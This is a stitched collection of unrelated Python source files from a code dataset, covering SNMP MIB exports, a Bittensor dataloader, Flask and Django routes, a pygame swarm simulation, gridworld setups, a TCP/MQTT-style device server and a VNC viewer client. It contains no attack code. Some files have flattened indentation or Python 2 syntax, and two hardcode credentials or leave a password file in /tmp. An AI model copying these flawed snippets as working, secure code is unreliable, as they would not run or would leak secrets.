mibBuilder.exportSymbols("S5-ETH-MULTISEG-TOPOLOGY-MIB", PYSNMP_MODULE_ID=s5EthMultisegTopologyMib, s5EnMsTopBdgNumber=s5EnMsTopBdgNumber, s5EnMsTopBdgEosEntry=s5EnMsTopBdgEosEntry, s5EnMsTopNmmMaxNum=s5EnMsTopNmmMaxNum, s5EnMsTopNmmEosTable=s5EnMsTopNmmEosTable, s5EnMsTopNmmChassisType=s5EnMsTopNmmChassisType, s5EnMsTopBdgLstChg=s5EnMsTopBdgLstChg, s5EnMsTopNmmCurNum=s5EnMsTopNmmCurNum, s5EnMsTopNmmIpAddr=s5EnMsTopNmmIpAddr, s5EnMsTopSrcMacSegId=s5EnMsTopSrcMacSegId, s5EnMsTopNmmSegId=s5EnMsTopNmmSegId, s5EnMsTopNmmEos=s5EnMsTopNmmEos, s5EnMsTopPortIfIndex=s5EnMsTopPortIfIndex, s5EnMsTopNmmPort=s5EnMsTopNmmPort, s5EthMultisegTopologyMib=s5EthMultisegTopologyMib, s5EnMsTopBdgEosSize=s5EnMsTopBdgEosSize, s5EnMsTopBdgType=s5EnMsTopBdgType, s5EnMsTopNmmMacAddr=s5EnMsTopNmmMacAddr, s5EnMsTopBdgStatus=s5EnMsTopBdgStatus, s5EnMsTopNmmSlot=s5EnMsTopNmmSlot, s5EnMsTopSrcMacAddrEntry=s5EnMsTopSrcMacAddrEntry, s5EnMsTopSrcMacAddrLstChg=s5EnMsTopSrcMacAddrLstChg, s5EnMsTopNmmLstChg=s5EnMsTopNmmLstChg, s5EnMsTopNmmEosSize=s5EnMsTopNmmEosSize, s5EnMsTopBdgSlotNum=s5EnMsTopBdgSlotNum, s5EnMsTopBdgCurNum=s5EnMsTopBdgCurNum, s5EnMsTopInfo=s5EnMsTopInfo, s5EnMsTopBdgMacAddr=s5EnMsTopBdgMacAddr, s5EnMsTopBdgPortNum=s5EnMsTopBdgPortNum, s5EnMsTopPortState=s5EnMsTopPortState, s5EnMsTopNmmLocalSeg=s5EnMsTopNmmLocalSeg, s5EnMsTopBdgHelloPortNum=s5EnMsTopBdgHelloPortNum, s5EnMsTopBdg=s5EnMsTopBdg, s5EnMsTopBdgTable=s5EnMsTopBdgTable, s5EnMsTopBdgHelloPortStatus=s5EnMsTopBdgHelloPortStatus, s5EnMsTopIpAddr=s5EnMsTopIpAddr, s5EnMsTopBdgNumPorts=s5EnMsTopBdgNumPorts, s5EnMsTopPortTable=s5EnMsTopPortTable, s5EnMsTopSrcMac=s5EnMsTopSrcMac, s5EnMsTopNmmTable=s5EnMsTopNmmTable, s5EnMsTopBdgEos=s5EnMsTopBdgEos, s5EnMsTopNmmEosEntry=s5EnMsTopNmmEosEntry, s5EnMsTopBdgMaxNum=s5EnMsTopBdgMaxNum, s5EnMsTopPort=s5EnMsTopPort, s5EnMsTopBdgHelloPortType=s5EnMsTopBdgHelloPortType, s5EnMsTopBdgEosTable=s5EnMsTopBdgEosTable, s5EnMsTopBdgCompBdgMac2=s5EnMsTopBdgCompBdgMac2, 
s5EnMsTopPortEntry=s5EnMsTopPortEntry, s5EnMsTopNmm=s5EnMsTopNmm, s5EnMsTopBdgEntry=s5EnMsTopBdgEntry, s5EnMsTopSrcMacAddr=s5EnMsTopSrcMacAddr, s5EnMsTopSrcMacAddrTable=s5EnMsTopSrcMacAddrTable, s5EnMsTopStatus=s5EnMsTopStatus, s5EnMsTopNmmEntry=s5EnMsTopNmmEntry, s5EnMsTopNmmCurState=s5EnMsTopNmmCurState, s5EnMsTopNmmBkplType=s5EnMsTopNmmBkplType, s5EnMsTopBdgCompBdgMac1=s5EnMsTopBdgCompBdgMac1, s5EnMsTopBdgIpAddr=s5EnMsTopBdgIpAddr)
| 16,987 | 8,657 |
import argparse
import bittensor
import requests
import random
from munch import Munch
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
class BittensorDataLoader():
    def __init__(self):
        """Set up IPFS endpoints and state for streaming the genesis dataset."""
        # IPFS hash of the genesis dataset
        # TODO (shibshib): Find a proper way to set this as config instead of hardcoding it.
        # More dataset hashes can be added as we add directories for other modalities.
        self.genesis_text_dataset_hash = "QmXwfPoh2QFYqC6cYcW8kzyd9ruFfhnUi2kVBkdhawjUzj"
        # Used to retrieve directory contents (Infura IPFS gateway DAG endpoint).
        self.dag_get = 'https://ipfs.infura.io:5001/api/v0/dag/get'
        # Used to retrieve file contents
        self.file_cat = 'https://ipfs.infura.io:5001/api/v0/cat'
        # Used when current corpus has been exhausted
        self.refresh_corpus = False
@staticmethod
def default_config() -> Munch:
parser = argparse.ArgumentParser();
BittensorDataLoader.add_args(parser)
config = bittensor.config.Config.to_config(parser);
return config
@staticmethod
def add_args(parser: argparse.ArgumentParser):
""" Add model params
"""
parser.add_argument('--dataloader.max_corpus_size', default=1e+6, type=int,
help='Maximum amount of data to download from IPFS into memory for training.')
parser.add_argument('--dataloader.num_workers', default=0, type=int,
help='Number of workers for data loader.')
    @staticmethod
    def check_config(config: Munch):
        """Validate the config; no dataloader-specific constraints yet."""
        pass
@staticmethod
def requests_retry_session(
retries=3,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
session=None,
):
""" Creates a retriable session for request calls. This enables
automatic retries and back-off retries should any request calls fail.
Args:
retries (int, optional): Maximum number of retries. Defaults to 3.
backoff_factor (float, optional): Factor by which to back off if a retry fails. Defaults to 0.3.
status_forcelist (tuple, optional): A set of integer HTTP status codes that we should force a retry on. Defaults to (500, 502, 504).
session ([type], optional): Session for which to set up the retries. Defaults to None.
Returns:
requests.Session(): A Requests Session object set up for retries and backoff.
"""
session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
def retrieve_directory(self, dir_hash: str):
"""Connects to Infura IPFS gateway and retrieves the directory of
genesis datasets.
Returns:
dict: A dictionary of the files inside of the genesis_datasets and their hashes.
"""
session = requests.Session()
params = (('arg', dir_hash),)
session.params.update(params)
directory = None
response = BittensorDataLoader.requests_retry_session(session=session).post(self.dag_get)
if response.status_code == 200:
directory = response.json()
return directory
    def __len__(self):
        """ Returns length of the dataset that the dataloader is processing
        """
        # Abstract in this base class; concrete loaders override it.
        pass
    def __getitem__(self, idx):
        """returns the next batch from the dataset.
        """
        # Abstract in this base class; concrete loaders implement batching.
        pass | 3835 | 1100 |
from flask import Blueprint
from flask import request
from datetime import datetime
from commons import api_utils
from services import timezone_service
# Blueprint grouping the public timezone API endpoints.
blueprint = Blueprint("api", __name__)

@blueprint.route('/timezones')
def timezones():
    """Return the full list of known timezone names as a 200 response."""
    all_zones = timezone_service.timezones()
    return api_utils.response(200, all_zones)
@blueprint.route('/now')
def now():
    # Return the current datetime converted to the ``timezone`` query arg.
    try:
        tz = request.args.get("timezone", default=None, type=str)
        dt = timezone_service.convert_datetime(datetime.now(), tz)
        return api_utils.response(200, dt)
    except Exception:
        # NOTE(review): any failure is reported as an invalid timezone —
        # confirm convert_datetime raises only timezone-related errors here.
        return api_utils.response(400, 'Invalid timezone informed') | 619 | 183 |
"""
Configuration file for nii_to_mif.py
"""
#: i/o
INPUT_NODE_FIELDS = ["dwi_file", "fmap_file"]
OUTPUT_NODE_FIELDS = ["dwi_file", "fmap_file"]
#: Keyword arguments
LOCATE_ASSOCIATED_KWARGS = dict(
input_names=["in_file"],
output_names=["json_file", "bvec_file", "bval_file"],
)
| 290 | 132 |
# nopycln: file
from pyinspect.exceptions import install_traceback
from pyinspect.show import showme, what
from pyinspect.find import search
from pyinspect.answers import get_answers, ask
from pyinspect.panels import ok, warn, error, message, Report, NestedPanel
from pyinspect._rich import console
from pyinspect.classes import Enhanced
from pyinspect.builtins import List, Tuple, Dict, pilist, pidict
from pyinspect._colors import (
salmon,
lightsalmon,
orange,
mocassin,
lightblue,
lightorange,
gray,
)
from rich import pretty
# Install rich's pretty-printing of values in the REPL.
# BUG FIX: rich's valid overflow methods are "fold", "crop", "ellipsis" and
# "ignore" — the original passed the misspelled "ellipse".
pretty.install(
    overflow="ellipsis",
    max_length=33,
)
# PyGithub is an optional dependency, used only to fetch repo stats.
try:
    from github import Github
except Exception:
    # Sentinel checked before any GitHub API call.
    Github = None
__author__ = "Federico Claudi"
__license__ = "MIT"
__maintainer__ = "Federico Claudi"
__email__ = "federicoclaudi@protonmail.com"
__status__ = "dev"
__website__ = "https://github.com/FedeClaudi/pyinspect"
__version__ = "0.1.1rc"
def whats_pi():
    """
    Prints a Report with an overview of `pyinspect`.

    Fixes over the previous version: the title typo "Pynspect" -> "Pyinspect",
    a stray trailing "s" in the PyGithub hint, redundant f-prefixes on
    placeholder-free literals, and the GitHub stars lookup is now guarded so
    a network/rate-limit failure cannot crash the overview.
    """
    # ? Intro
    rep = Report("Pyinspect", dim=orange, accent=orange)
    rep._type = "Pyinspect info"
    rep.width = 100
    rep.add(
        f"[b {lightorange}]The python package for lazy programmers",
        justify="center",
    )
    # Features summary
    rep.add(
        f"""
[{salmon}]Don't remember a function's name?[/{salmon}] Use `pyinspect` to look for it.
[{salmon}]Don't remember what a function does?[/{salmon}] Use `pyinspect` to print its source code directly to your terminal.
[{salmon}]Can't figure out why you keep getting an error?[/{salmon}] Use `pyinspect`'s fancy tracebacks to figure it out
[{salmon}]Still can't figure it out, but too lazy to google it?[/{salmon}] Use `pyinspect` to print Stack Overflow's top answer for your error message directly to your terminal!
"""
    )
    # Package / Repo info as a nested panel
    info = NestedPanel(color=mocassin, dim=mocassin)
    _info = dict(
        Author=__author__,
        License=__license__,
        Version=__version__,
        Website=__website__,
    )
    if Github is not None:
        # Guard the network call: an unauthenticated GitHub API request can
        # fail (offline, rate limit) and should not break the report.
        try:
            n_stars = Github().get_repo("FedeClaudi/pyinspect").stargazers_count
            _info["Github stars"] = n_stars
        except Exception:
            warn(
                "Could not fetch repo info",
                "GitHub API request failed (offline or rate-limited?)",
            )
    else:
        warn(
            "Could not fetch repo info",
            "Perhaps `PyGithub` is not installed?",
        )
    for k, v in _info.items():
        info.add(f"[b {gray}]{k}[/b {gray}]: [{orange}]{v}", justify="right")
    rep.add(info, "rich")
    # Features examples
    rep.add("""## Features""", "markdown", style=lightsalmon)
    features = {
        "Look up local variables": "pinspect.what()",
        "Search functions by name": "pinspect.search(package, function_name)",
        "Print source code to console": "pinspect.showme(function)",
        "Enhanced tracebacks": "pinspect.install_traceback()",
        "Render [i]Stack Overflow[/i] answers in the terminal": 'pinspect.ask("How to python?")',
    }
    for txt, code in features.items():
        rep.spacer()
        rep.add(f"[{gray}]" + txt, justify="center")
        rep.add(" " + code, "code")
    rep.spacer()
    rep.add(f"[{lightorange}]... and a bunch of others!")
    rep.spacer(2)
    rep.add(f"[{lightsalmon}]Get in touch at:[/{lightsalmon}] {__website__}")
    console.print(rep)
| 3,300 | 1,118 |
""" Variables that contain the logo ASCII text """
SERVER_TOOLS_LOGO = r"""
____ _____ _
/ ___| ___ _ ____ _____ _ __ |_ _|__ ___ | |___
\___ \ / _ \ '__\ \ / / _ \ '__| | |/ _ \ / _ \| / __|
___) | __/ | \ V / __/ | | | (_) | (_) | \__ \
|____/ \___|_| \_/ \___|_| |_|\___/ \___/|_|___/
"""
SCAN_PORTS_LOGO = r"""
___ ___ __ _ _ __ _ __ ___ _ __| |_ ___
/ __|/ __/ _` | '_ \ | '_ \ / _ \| '__| __/ __|
\__ \ (_| (_| | | | | | |_) | (_) | | | |_\__ \
|___/\___\__,_|_| |_| | .__/ \___/|_| \__|___/
"""
DNS_LOGO = r"""
____ _ _ ____
| _ \| \ | / ___|
| | | | \| \___ \
| |_| | |\ |___) |
|____/|_| \_|____/
"""
HOST_TO_IP_LOGO = r"""
_ _ _ _____ ___ ____
| | | | ___ ___| |_ |_ _|__ |_ _| _ \
| |_| |/ _ \/ __| __| | |/ _ \ | || |_) |
| _ | (_) \__ \ |_ | | (_) | | || __/
|_| |_|\___/|___/\__| |_|\___/ |___|_|
"""
| 965 | 497 |
# -*- coding: utf-8 -*-
import os
import numpy as np
from skimage import io
import matplotlib.pyplot as plt
from PIL import Image
def make_voc_segment_dataset(voc_directory: str, save_directory: str):
    """Reorganize a Pascal VOC release into a flat segmentation dataset.

    For every sample listed in the trainval split this copies:
      - the JPEG image into  <save_directory>/VOCSegmentation/train/images
      - the class mask (255 label zeroed) into   .../train/masks
      - the original palettized PNG into          .../train/visualization

    Raises:
        ValueError: if an output folder holds a *partial* copy (neither
            empty nor the expected 2913 files) -- mixing old and new files
            could silently corrupt the dataset.
    """
    ## Set some directory
    JPEGImages_dir = os.path.join(voc_directory, "JPEGImages")
    SegmentationClass_dir = os.path.join(voc_directory, "SegmentationClass")
    ImageSets_dir = os.path.join(voc_directory, "ImageSets", "Segmentation")
    trainval_path = os.path.join(ImageSets_dir, "trainval.txt")
    main_folder = os.path.join(save_directory, "VOCSegmentation")
    train_folder = os.path.join(main_folder, "train")
    train_images_folder = os.path.join(train_folder, "images")
    train_masks_folder = os.path.join(train_folder, "masks")
    train_visualization_folder = os.path.join(train_folder, "visualization")

    ## Check dataset state. need_build becomes True if ANY output folder is
    ## missing or empty. (The old code raised on empty folders -- e.g. those
    ## left by an aborted first run -- and only honored the last folder's state.)
    need_build = False
    check_list = [train_images_folder, train_masks_folder, train_visualization_folder]
    for check_path in check_list:
        if not os.path.exists(check_path):
            need_build = True
            continue
        num_files = len(os.listdir(check_path))
        if num_files == 0:
            need_build = True
        elif num_files != 2913:  # expected number of trainval samples
            raise ValueError(f"Detect incomplete data in {check_path}. "
                             "Please delete all data and unzip again.")

    print("Make some folders.")
    # exist_ok makes these idempotent; parents (main_folder etc.) are created too.
    os.makedirs(train_images_folder, exist_ok=True)
    os.makedirs(train_masks_folder, exist_ok=True)
    os.makedirs(train_visualization_folder, exist_ok=True)

    print("Get data list.")
    with open(trainval_path) as f:
        # Drop the trailing empty entry produced by the file's final newline.
        t = f.read().split('\n')[:-1]

    if need_build:
        print("Start to make dataset.")
        for name in t:
            ## get file path
            im_path = os.path.join(JPEGImages_dir, name + ".jpg")
            gt_path = os.path.join(SegmentationClass_dir, name + ".png")
            ## read data
            im = io.imread(im_path)
            vs = Image.open(gt_path)  # keep the palettized PNG for visualization
            gt = np.array(Image.open(gt_path))
            gt[gt == 255] = 0  # map the 255 (VOC 'void') label to background
            io.imsave(os.path.join(train_images_folder, os.path.basename(im_path)), im, check_contrast=False)
            io.imsave(os.path.join(train_masks_folder, os.path.basename(gt_path)), gt, check_contrast=False)
            vs.save(os.path.join(train_visualization_folder, os.path.basename(gt_path)))
        print("Finished making dataset.")
    else:
        print("Already made dataset.")
import pygame, sys
from pygame.locals import *
from robot import Robot
from wall import Wall
from leader import Leader
import random
def main(num_robots, width, height):
print "Initializing..."
#Create graphics window
pygame.init()
screen = pygame.display.set_mode((width, height),0,32)
pygame.display.set_caption('Swarm Simulation')
# walls = pygame.sprite.RenderUpdates()
robots = pygame.sprite.RenderUpdates()
clock = pygame.time.Clock()
screen.fill((255,255,255))
# w = Wall(100,300,200,20)
# walls.add(w)
# w = Wall(400,300,200,20)
# walls.add(w)
#Create Leader
#Do this first, so leader has id=0
leader = Leader(width/2, height/2)
robots.add(leader)
#Create robots
for i in range(0, num_robots):
r = Robot(width/2 + random.uniform(-100,100), height/2 + + random.uniform(-100,100))
robots.add(r)
print "Starting Simulation"
while (True):
for event in pygame.event.get():
if event.type==QUIT:
pygame.quit()
sys.exit()
for r in robots:
r.calc_force(robots)
# for w in walls:
# w.calc_forces(robots)
#Cycle forward
robots.update()
#Clear screen
screen.fill((255,255,255))
#Redraw
dirty = robots.draw(screen)
#Refresh screen
pygame.display.update()
#draw walls
# dirty = walls.draw(screen)
# pygame.display.update()
clock.tick(30)
main(5, 500, 500)
| 1,551 | 550 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
import profiles.urls
import accounts.urls
import trains.urls
import ticket.urls
from route.views import *
from station.views import *
from trains.views import *
from . import views
# Project URL configuration.
# NOTE(review): patterns() was deprecated in Django 1.8 and removed in 1.10;
# this layout presumes the project pins an older Django -- confirm.
urlpatterns = patterns(
    '',
    # Static site pages.
    url(r'^$', views.HomePage.as_view(), name='home'),
    url(r'^about/$', views.AboutPage.as_view(), name='about'),
    # App-level URL includes (accounts mounted at the site root).
    url(r'^', include(accounts.urls, namespace='accounts')),
    url(r'^trains/', include(trains.urls, namespace='trains')),
    url(r'^users/', include(profiles.urls, namespace='profiles')),
    url(r'^ticket/', include(ticket.urls, namespace='ticket')),
    # Function-based views imported via star-imports above.
    url(r'^route/(?P<train_id>\d+)$', get_route_by_train, name='route'),
    url(r'^search/', get_form, name='search'),
    url(r'^display/', trainEnquiry, name='display'),
    url(r'^admin/', include(admin.site.urls)),
)
# CAPTCHA endpoints used by the registration forms.
urlpatterns += patterns('',
    url(r'^captcha/', include('captcha.urls')),
)
# User-uploaded files like profile pics need to be served in development
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 1,246 | 401 |
from games.gridworld.grid import Grid
from games.gridworld.gridworld import Gridworld
from games.gridworld.gridworld_direction import GridworldDirection
#####################################
# Example transition functions
#####################################
def deterministic_transition(action):
    """A transition with no noise: the requested action happens with probability 1."""
    outcomes = [action]
    weights = [1.0]
    return outcomes, weights
def shaky_transition(action):
    """Noisy transition: mostly the requested direction, sometimes a neighbour.

    Returns the candidate actions (requested direction plus the two adjacent
    directions in enum order) and their weights.
    """
    dirs = list(GridworldDirection)
    action_index = dirs.index(action)
    side1 = dirs[action_index - 1]  # negative index wraps naturally
    # Fix: wrap explicitly -- for the last direction, action_index + 1
    # raised IndexError in the original.
    side2 = dirs[(action_index + 1) % len(dirs)]
    # NOTE(review): weights sum to 1.2 -- presumably normalized downstream; confirm.
    return [action, side1, side2], [0.8, 0.2, 0.2]
#####################################
# Example Gridworlds
#####################################
# Simple 4x3 world: -50 trap at (3, 1), +50 goal at (3, 2), one wall, -1 per step.
simple_terminals = {(3, 1) : -50, (3, 2) : 50}
simple_living_reward = -1
simple_walls = {(1, 1)}
simple_grid_size = (4,3)
simple_start = (0, 0)
simple_grid = Grid(simple_terminals, simple_living_reward, simple_walls,
                   simple_grid_size)
# Bridge crossing: a one-cell-wide path (y == 1) to a +10 goal, flanked by
# -100 terminal "cliff" cells above and below, walled off at both ends.
bridge_crossing_terminals = {(x, y) : -100
                             for x in range(1, 6) for y in [0, 2]}
bridge_crossing_terminals.update({(6, 1) : 10})
bridge_crossing_walls = {(0, 0), (0, 2), (6, 0), (6, 2)}
bridge_crossing_size = (7, 3)
bridge_crossing_start = (0, 1)
bridge_crossing_grid = Grid(bridge_crossing_terminals, simple_living_reward,
                            bridge_crossing_walls, bridge_crossing_size)
def make_simple_gridworld(use_display):
    """The simple 4x3 world with fully deterministic movement."""
    return Gridworld(simple_grid, deterministic_transition,
                     simple_start, use_display)


def make_classic_gridworld(use_display):
    """The simple 4x3 world with noisy (shaky) movement."""
    return Gridworld(simple_grid, shaky_transition, simple_start, use_display)


def make_bridge_crossing_gridworld(use_display):
    """The bridge-crossing world with noisy movement."""
    return Gridworld(bridge_crossing_grid, shaky_transition,
                     bridge_crossing_start, use_display)
| 1,798 | 606 |
#!/usr/bin/python3
import MQTTV3112 as MQTTV3
import traceback, datetime, os, sys, select, binascii
import time, traceback
import math
import socketserver
import json
import logging
from logging.handlers import RotatingFileHandler, TimedRotatingFileHandler
# Application logger: file (rotated at midnight, 20 backups) plus console.
logger = logging.getLogger('seeed_3thMqtt')
logger.setLevel(logging.INFO)
# create file handler which logs even debug messages
# fh = RotatingFileHandler('logs/_3mq_data.log', maxBytes=102400, backupCount=20)
fh = TimedRotatingFileHandler('./logs/seeed_3mq.log', when='midnight', backupCount=20)
fh.setLevel(logging.INFO)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
# Message types: MQTT v3.1.1 control-packet type codes 1..14.
CONNECT, CONNACK, PUBLISH, PUBACK, PUBREC, PUBREL, \
PUBCOMP, SUBSCRIBE, SUBACK, UNSUBSCRIBE, UNSUBACK, \
PINGREQ, PINGRESP, DISCONNECT = range(1, 15)
# Credentials every device must present on CONNECT (password compared as bytes).
Username = 'seeed'
Passwd = b'sensecap'
def timestamp():
    """Return the current local time as 'YYYYMMDD HHMMSS.ffffff'.

    Uses strftime's %f so the microsecond field keeps its leading zeros;
    the old str/float round-trip turned e.g. 123 microseconds into '.123'
    (which reads as 123000 us).
    """
    return datetime.datetime.now().strftime('%Y%m%d %H%M%S.%f')
class MyTCPHandler(socketserver.BaseRequestHandler):
    """
    The request handler class for our server.

    It is instantiated once per connection to the server, and must
    override the handle() method to implement communication to the
    client.
    """

    def handle(self):
        """Process MQTT packets from one client until disconnect or error."""
        # Lazily created maps: socket id -> client identifier / protocol version.
        if not hasattr(self, "ids"):
            self.ids = {}
        if not hasattr(self, "versions"):
            self.versions = {}
        inbuf = True
        terminated = False
        client = self.request
        while inbuf is not None and not terminated:
            try:
                inbuf = MQTTV3.getPacket(client) # get one packet
                packet = MQTTV3.unpackPacket(inbuf)
                if packet.fh.MessageType == MQTTV3.CONNECT:
                    self.ids[id(client)] = packet.ClientIdentifier
                    self.versions[id(client)] = 3
                    logger.debug("{} {}".format(self.ids[id(client)], repr(packet)))
                    # Check user name and passwd; the device must be authorized
                    # by username and password before anything else.
                    logger.debug('Username={} passwd={}'.format(packet.username, packet.password))
                    if packet.username == Username and packet.password == Passwd:
                        logger.info("Device {} authorized!".format(self.ids[id(client)]))
                    else:
                        logger.error("Username or password invalid")
                        terminated = True
                        break
                    # Send downlink command (report interval config, ms timestamp).
                    dl_str = '{\"type\":2,\"tmst\":\"' + '{}'.format(math.ceil(time.time()*1000)) + '\",\"intv\":300}'
                    downlinkconf = bytes(dl_str, 'utf-8')
                    client.sendall(downlinkconf)
                    logger.info('Send {}'.format(downlinkconf))
                elif packet.fh.MessageType == MQTTV3.PUBLISH:
                    # Parse turn code
                    logger.debug("{} {}".format(self.ids[id(client)], repr(packet)))
                    json_obj = json.loads(packet.data)
                    # Fix: the original tested the `json` *module* (always
                    # truthy), making the error branch unreachable.
                    if json_obj is not None:
                        logger.info('{}'.format(json_obj))
                    else:
                        logger.error("Decode json fail.")
                elif packet.fh.MessageType == MQTTV3.DISCONNECT:
                    logger.debug("{} {}".format(self.ids[id(client)], repr(packet)))
                    logger.info("{} {}".format(self.ids[id(client)], " connection closing"))
                    client.close()
                    terminated = True
            except Exception:
                # Was a silent bare `except:`; log why the session ends
                # (bad packet, closed socket, JSON error) before terminating.
                logger.exception("Error while handling client connection")
                terminated = True
class MyThreadingTCPServer(socketserver.ThreadingTCPServer):
    """TCP server that handles each connection in its own thread."""
    # Rebind the listening port immediately after a restart.
    allow_reuse_address = True
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 1884
logger.info("Listening on {} port {}".format(HOST, PORT))
server = MyThreadingTCPServer((HOST, PORT), MyTCPHandler)
server.serve_forever()
| 4,369 | 1,311 |
from aws_cdk import core, aws_eks
from .eks_base import EKSBase
from .alb_ingress import ALBIngressController
class EksSimpleFargateStack(core.Stack):
    """CDK stack composing a base EKS cluster with an ALB ingress controller."""

    def __init__(self, scope: core.Construct, construct_id: str,
                 eks_version=aws_eks.KubernetesVersion.V1_19, cluster_name=None,
                 capacity_details='small', fargate_enabled=False, bottlerocket_asg=False, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        # Keep the configuration on the instance so it can be inspected later.
        self.eks_version = eks_version
        self.cluster_name = cluster_name
        self.capacity_details = capacity_details
        self.fargate_enabled = fargate_enabled
        self.bottlerocket_asg = bottlerocket_asg
        # Mirror the instance attributes into the dict EKSBase expects.
        cluster_settings = {
            key: getattr(self, key)
            for key in ('eks_version', 'cluster_name', 'capacity_details',
                        'fargate_enabled', 'bottlerocket_asg')
        }
        eks_base = EKSBase(self, "Base", cluster_configuration=cluster_settings)
        ALBIngressController(self, "ALBIngress", cluster=eks_base.cluster)
        # The code that defines your stack goes here
| 1,187 | 376 |
#
# Gen2 observation workstation client -- command line version
#
"""
Gen2 observation workstation client -- command line version
"""
import sys, time, os
import threading
import binascii
from g2base import ssdlog, myproc
from g2base.remoteObjects import remoteObjects as ro
from g2base.remoteObjects import Monitor
from g2client import soundsink
# Default ports for the remote-object service and its local monitor.
default_svc_port = 19051
default_mon_port = 19052
# TODO: put this in a utilities module
def error(msg, exitcode=0):
    """Called for an error. Print _msg_ to stderr and exit program
    with code _exitcode_ if _exitcode_ is set to non-zero.
    """
    print(msg, file=sys.stderr)
    if exitcode != 0:
        sys.exit(exitcode)
class g2Disp(object):
    """Callback object served over remoteObjects for the Gen2 display client.

    Manages VNC viewer subprocesses (one per local display+geometry) and
    relays sound events through a local Monitor instance.
    """

    def __init__(self, **kwdargs):
        # Attributes are injected by the caller (expects logger, basename).
        self.__dict__.update(kwdargs)
        self.lock = threading.RLock()
        # Maps display+geometry key -> running VNC viewer process group.
        self.procs = {}
        # Needed for starting our own tasks
        self.tag = 'g2disp'
        self.shares = ['logger', 'threadPool']

    def ro_echo(self, arg):
        """Liveness check for remote callers: returns the argument unchanged."""
        return arg

    def start_server(self, rohosts, options):
        """Initialize remoteObjects, wire sound sink/source, start servers.

        rohosts -- hosts for the remoteObjects subsystem.
        options -- parsed command-line options (ports, monitor name, threads).
        """
        # Initialize remoteObjects subsystem
        try:
            ro.init(rohosts)
        except ro.remoteObjectError as e:
            self.logger.error("Error initializing remote objects subsystem: %s" % \
                str(e))
            return
        # channels we are interested in
        channels = ['sound']
        self.ev_quit = threading.Event()
        self.server_exited = threading.Event()
        # Create a local pub sub instance
        # mymon = PubSub.PubSub('%s.mon' % self.basename, self.logger,
        #                       numthreads=30)
        monname = '%s.mon' % self.basename
        mymon = Monitor.Monitor(monname, self.logger,
                                numthreads=options.numthreads,
                                ev_quit=self.ev_quit)
        self.monitor = mymon
        # Sink plays received sound events; source lets us publish them.
        self.soundsink = soundsink.SoundSink(monitor=mymon,
                                             logger=self.logger,
                                             ev_quit=self.ev_quit)
        self.soundsource = soundsink.SoundSource(monitor=mymon,
                                                 logger=self.logger,
                                                 channels=['sound'])
        # Subscribe our callback functions to the local monitor
        mymon.subscribe_cb(self.soundsink.anon_arr, channels)
        # Flags consulted by stop_server() so teardown only touches what started.
        self.mon_server_started = False
        self.ro_server_started = False
        # Startup monitor threadpool
        mymon.start(wait=True)
        mymon.start_server(wait=True, port=options.monport)
        self.mon_server_started = True
        self.threadPool = self.monitor.get_threadPool()
        # subscribe our monitor to the central monitor hub
        mymon.subscribe_remote(options.monitor, channels, ())
        # publish to central monitor hub
        #mymon.subscribe(options.monitor, channels, ())
        mymon.publish_to(options.monitor, ['sound'], {})
        self.svc = ro.remoteObjectServer(svcname=self.basename,
                                         obj=self, logger=self.logger,
                                         port=options.port,
                                         ev_quit=self.ev_quit,
                                         threadPool=self.threadPool,
                                         #auth=None,
                                         usethread=True)
        self.svc.ro_start(wait=True)
        self.ro_server_started = True

    def stop_server(self):
        """Stop the monitor server, RO server and monitor client in order."""
        self.logger.info("%s exiting..." % self.basename)
        if self.mon_server_started:
            self.logger.info("stopping monitor server...")
            self.monitor.stop_server(wait=True)
        if self.ro_server_started:
            self.logger.info("stopping remote object server...")
            self.svc.ro_stop(wait=True)
        self.logger.info("stopping monitor client...")
        self.monitor.stop(wait=True)

    def viewerOn(self, localdisp, localgeom, remotedisp, passwd, viewonly):
        """Launch a VNC viewer of *remotedisp* on the local display.

        *passwd* arrives base64-encoded and is written to a temp file handed
        to vncviewer. A viewer already running for the same display+geometry
        is killed first. Unmutes sound as a side effect.
        """
        self.muteOff()
        passwd = binascii.a2b_base64(passwd)
        passwd_file = '/tmp/v__%d' % os.getpid()
        with open(passwd_file, 'wb') as out_f:
            out_f.write(passwd)
        # VNC window
        # NOTE(review): option styles are mixed ("-display X" vs "-geometry=Y");
        # confirm against the vncviewer build actually deployed.
        cmdstr = "vncviewer -display %s -geometry=%s %s -passwd %s RemoteResize=0" % (
            localdisp, localgeom, remotedisp, passwd_file)
        if viewonly:
            cmdstr += " -viewonly"
        self.logger.info("viewer ON (-display %s -geometry=%s %s)" % (
            localdisp, localgeom, remotedisp))
        key = localdisp + localgeom
        # Replace any existing viewer for this display+geometry.
        try:
            self.procs[key].killpg()
        except Exception as e:
            pass
        try:
            self.procs[key] = myproc.myproc(cmdstr, usepg=True)
        except Exception as e:
            self.logger.error("viewer on error: %s" % (str(e)))
        # NOTE(review): the password file is left on disk (cleanup commented
        # out below) -- confirm whether vncviewer reads it after startup.
        #os.remove(passwd_file)
        return 0

    def viewerOff(self, localdisp, localgeom):
        """Kill the viewer for this display+geometry; mutes sound first."""
        self.muteOn()
        self.logger.info("viewer OFF (%s)" % (localdisp))
        try:
            key = localdisp + localgeom
            self.procs[key].killpg()
            del self.procs[key]
        except Exception as e:
            self.logger.error("viewer off error: %s" % (str(e)))
        return 0

    def allViewersOff(self):
        """Kill every running viewer process group."""
        self.logger.info("All viewers OFF")
        for key in list(self.procs.keys()):
            try:
                self.procs[key].killpg()
                del self.procs[key]
            except Exception as e:
                self.logger.warn("viewer off error: %s" % (str(e)))
        return 0

    def muteOn(self):
        """Stop playing incoming sound events."""
        self.soundsink.muteOn()
        return 0

    def muteOff(self):
        """Resume playing incoming sound events."""
        self.soundsink.muteOff()
        return 0
class CmdLineUI(object):
